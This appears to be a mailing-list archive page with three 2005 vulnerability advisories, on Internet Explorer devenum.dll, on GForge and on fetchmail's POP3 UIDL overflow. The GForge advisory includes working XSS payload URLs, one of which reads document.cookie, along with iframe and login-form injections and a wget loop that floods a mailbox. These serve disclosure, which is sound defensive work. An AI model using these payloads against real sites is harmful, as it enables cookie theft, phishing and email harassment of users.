[VulnWatch] NSFOCUS SA2005-02 : Microsoft IE Devenum.dll COM Instantiation Remote Code Execution Vulnerability

2005-08-09T21:02:01Z

NSFOCUS Security Advisory(SA2005-02)

Topic: Microsoft IE Devenum.dll COM Instantiation Remote Code Execution Vulnerability

Release Date: 2005-08-10

CVE CAN ID: CAN-2005-1990

http://www.nsfocus.com/english/homepage/research/0502.htm

Affected systems & software
===========================

Microsoft Internet Explorer 5.01 SP4
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6
Microsoft Internet Explorer 6 SP1

Unaffected systems & software
=============================

Description
============

NSFocus Security Team discovered a security vulnerability in Microsoft Internet
Explorer. By crafting a malicious HTML page and alluring users to visit it,
a remote attacker can execute arbitrary code with the privilege of the user.

Internet Explorer does not properly call interface arguments when instantiating
COM component in devenum.dll, resulting in exceptional memory access which
might cause IE to crash. Carefully crafted HTML page might allow a remote
attacker to execute arbitrary code.

Workaround
=============

Disable ActiveX control in Internet Explorer.

Vendor Status
==============

2005.07.13 Informed the vendor.
2005.07.16 The vendor confirmed the vulnerability
2005.08.09 The vendor releases a security bulletin (MS05-038) and related
patches.

Detail Microsoft Security Bulletin is available at:
http://www.microsoft.com/technet/security/bulletin/MS05-038.mspx

Additional Information
========================

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-1990 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security problems.
Candidates may change significantly before they become official CVE entries.

Acknowledgment
===============

Hu Qianwei of NSFOCUS Security Team found the vulnerability.

DISCLAIMS
==========
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESSED OR IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENT SHALL NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PROVIDED THAT THE
ADVISORY IS NOT MODIFIED IN ANY WAY.

Copyright 1999-2005 NSFOCUS. All Rights Reserved. Terms of use.

NSFOCUS Security Team <security@...>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)

PGP Key: http://www.nsfocus.com/homepage/research/pgpkey.asc
Key fingerprint = F8F2 F5D1 EF74 E08C 02FE 1B90 D7BF 7877 C6A6 F6DA

attachment0 (196 bytes) Download Attachment

Cross Site Scripting vulnerabilities in GForge

2005-07-27T14:37:16Z

---------------------------------------------------------------------------
Various Vulnerabilities in GForge
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GForge - 4.5 (Current)

GForge has tools to help your team collaborate, like message forums and
mailing lists; tools to create and control access to Source Code
Management
repositories like CVS and Subversion. GForge automatically creates a
repository
and controls access to it depending on the role settings of the project.

Web : http://gforge.org/

---------------------------------------------------------------------------

A) Cross Site Scripting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1.- In the Forum Module:

http://[target]/forum/forum.php?forum_id="><script>alert('hi')</script>
http://[target]/forum/forum.php?group_id="><script>alert('hi')</script>

(NOTE: The group_id parameter is ALWAYS vulnerable.)

2.- In the Task Module:

http://[target]/pm/task.php?func=detailtask&project_task_id="><h1>hi!</h1>&group_id=1&group_project_id=3

3.- In the Snippets Module:

http://[target]/snippet/detail.php?type=snippet&id=21"><iframe%
20src=http://www.playboy.com></iframe><font%20size="

4.- In the search engine:

To try it simply enter any valid XSS test such as "><h1>hi!!!</h1> in
the
search field and press enter or try the following URL:

http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21%
3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe%
3E&Search=Search

5.- In other modules:

http://[target]//frs/admin/qrs.php?group_id="><script>alert(document.cookie)</script>
http://[target]/notepad.php?form=parent;%0d%0a-->%0d%
0a</script><body><h1>hi!</h1></body></html><!--

NOTE: (rows, cols and wrap paremeter are also vulnerables).

6.- In the Login Form:

The login form is also vulnerable to XSS (Cross Site Scripting) attacks.
This may
be used to launch phising attacks by sending HTML e-mails (i.e.: saying
that you need
to upgrade to the latest GForge version due to a security problem) and
putting in the
e-mail an HTML link that points to an specially crafted url that inserts
an html form
in the GForge login page and when the user press the login button,
he/she send the
credentials to the attackers website.

POC. To "play" with this, simply go to the login page and insert in the
login field
then following text:

"><iframe src=http://www.playboy.com></iframe><font size="

B) E-Mail Flood
~~~~~~~~~~~~~~~

The 'forgot your password?' feature allows a remote user to load a
certain URL to
cause the service to send a validation e-mail to the specified user's
e-mail address.
There is no limit to the number of messages sent over a period of time,
so a remote
user can flood the target user's secondary e-mail address. E-Mail Flood,
E-Mail bomber.

The following is a "Proof Of Concept" of this vulnerability:

[joxean@nemobox]$ while [ true ]; do
> wget http://[target]/account/lostpw.php?loginname=joxean
> done

The "pending account" confirmation e-mail is also vulnerable so, a
mailicious user can
flood any e-mail box even if they are not GForge registered users.

The fix:
~~~~~~~~

There is no fix at the moment.

Workarounds:
~~~~~~~~~~~~

There are no workarounds except by using a method to automagically catch
the XSS
request such as WASP (available via CVS at
https://savannah.nongnu.org/wasp) or
mod_security (available at http://www.modsecurity.org/) for Apache Web
Servers.

Timeline:
~~~~~~~~~

25-Apr-2005 Vendor contacted
25-Apr-2005 Initial Vendor response (without interest on fixing bugs)
25-Apr-2005 Response to vendor
04-Jun-2005 One XSS bug (not discovered by me) closed without a fix
23-Jun-2005 Vendor RE-contacted (No response)
27-Jul-2005 Advisory released

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

signature.asc (196 bytes) Download Attachment

fetchmail security announcement fetchmail-SA-2005-01

2005-07-26T09:44:08Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

fetchmail-SA-2005-01: security announcement

Topic: remote code injection vulnerability in fetchmail

Author: Matthias Andree
Version: 1.02
Announced: 2005-07-21
Type: buffer overrun/stack corruption/code injection
Impact: account or system compromise possible through malicious
or compromised POP3 servers
Danger: high: in sensitive configurations, a full system
compromise is possible
(for 6.2.5.1: denial of service for the whole fetchmail
system is possible)
CVE Name: CAN-2005-2335
URL: http://fetchmail.berlios.de/fetchmail-SA-2005-01.txt
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=212762
http://www.vuxml.org/freebsd/3497d7be-2fef-45f4-8162-9063751b573a.html
http://www.vuxml.org/freebsd/3f4ac724-fa8b-11d9-afcf-0060084a00e5.html
http://www.freebsd.org/cgi/query-pr.cgi?pr=83805
http://www.heise.de/security/news/meldung/62070
Thanks: Edward J. Shornock (located the bug in UIDL code)
Miloslav Trmac (pointed out 6.2.5.1 was faulty)
Ludwig Nussel (provided minimal correct fix)

Affects: fetchmail version 6.2.5.1 (denial of service)
fetchmail version 6.2.5 (code injection)
fetchmail version 6.2.0 (code injection)
(other versions have not been checked)

Not affected: fetchmail 6.2.5.2
fetchmail 6.2.6-pre7
fetchmail 6.3.0 (not released yet)

Older versions may not have THIS bug, but had been found
to contain other security-relevant bugs.

Corrected: 2005-07-22 01:37 UTC (SVN) - committed bugfix (r4157)
2005-07-22 fetchmail-patch-6.2.5.2 released
2005-07-23 fetchmail-6.2.5.2 tarball released

0. Release history

2005-07-20 1.00 - Initial announcement
2005-07-22 1.01 - Withdrew 6.2.5.1 and 6.2.6-pre5, the fix was buggy
and susceptible to denial of service through
single-byte read from 0 when either a Message-ID:
header was empty (in violation of RFC-822/2822)
or the UIDL response did not contain an UID (in
violation of RFC-1939).
- Add Credits.
- Add 6.2.5.1 failure details to sections 2 and 3
- Revise section 5 and B.
2005-07-26 1.02 - Revise section 0.
- Add FreeBSD VuXML URL for 6.2.5.1.
- Add heise security URL.
- Mention release of 6.2.5.2 tarball.

1. Background

fetchmail is a software package to retrieve mail from remote POP2, POP3,
IMAP, ETRN or ODMR servers and forward it to local SMTP, LMTP servers or
message delivery agents.

2. Problem description

The POP3 code in fetchmail-6.2.5 and older that deals with UIDs (from
the UIDL) reads the responses returned by the POP3 server into
fixed-size buffers allocated on the stack, without limiting the input
length to the buffer size. A compromised or malicious POP3 server can
thus overrun fetchmail's stack. This affects POP3 and all of its
variants, for instance but not limited to APOP.

In fetchmail-6.2.5.1, the attempted fix prevented code injection via
POP3 UIDL, but introduced two possible NULL dereferences that can be
exploited to mount a denial of service attack.

3. Impact

In fetchmail-6.2.5 and older, very long UIDs can cause fetchmail to
crash, or potentially make it execute code placed on the stack. In some
configurations, fetchmail is run by the root user to download mail for
multiple accounts.

In fetchmail-6.2.5.1, a server that responds with UID lines containing
only the article number but no UID (in violation of RFC-1939), or a
message without Message-ID when no UIDL support is available, can crash
fetchmail.

4. Workaround

No reasonable workaround can be offered at this time.

5. Solution

Upgrade your fetchmail package to version 6.2.5.2.

You can either download a complete tarball of fetchmail-6.2.5.2.tar.gz,
or you can download a patch against fetchmail-6.2.5 if you already have
the 6.2.5 tarball. Either is available from:

<http://developer.berlios.de/project/showfiles.php?group_id=1824>

To use the patch:

1. download fetchmail-6.2.5.tar.gz (or retrieve the version you already
had downloaded) and fetchmail-patch-6.2.5.2.tar.gz
2. unpack the tarball: gunzip -c fetchmail-6.2.5.tar.gz | tar xf -
3. unpack the patch: gunzip fetchmail-patch-6.2.5.2.gz
4. apply the patch: cd fetchmail-6.2.5 ; patch -p1 <../fetchmail-patch-6.2.5.2
5. now configure and build as usual - detailed instructions in the file
named "INSTALL".

A. References

fetchmail home page: <http://fetchmail.berlios.de/>

B. Copyright, License and Warranty

(C) Copyright 2005 by Matthias Andree, <matthias.andree@...>.
Some rights reserved.

This work is licensed under the Creative Commons
Attribution-NonCommercial-NoDerivs German License. To view a copy of
this license, visit http://creativecommons.org/licenses/by-nc-nd/2.0/de/
or send a letter to Creative Commons; 559 Nathan Abbott Way;
Stanford, California 94305; USA.

THIS WORK IS PROVIDED FREE OF CHARGE AND WITHOUT ANY WARRANTIES.
Use the information herein at your own risk.

END OF fetchmail-SA-2005-01.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)

iD8DBQFC5lpIvmGDOQUufZURAlv1AKCUuwHKgC/lln+fhYgt8Ba6VxI1WQCgpmBj
SLivUn3+6/zifjC4Hnaw0uc=
=PebP
-----END PGP SIGNATURE-----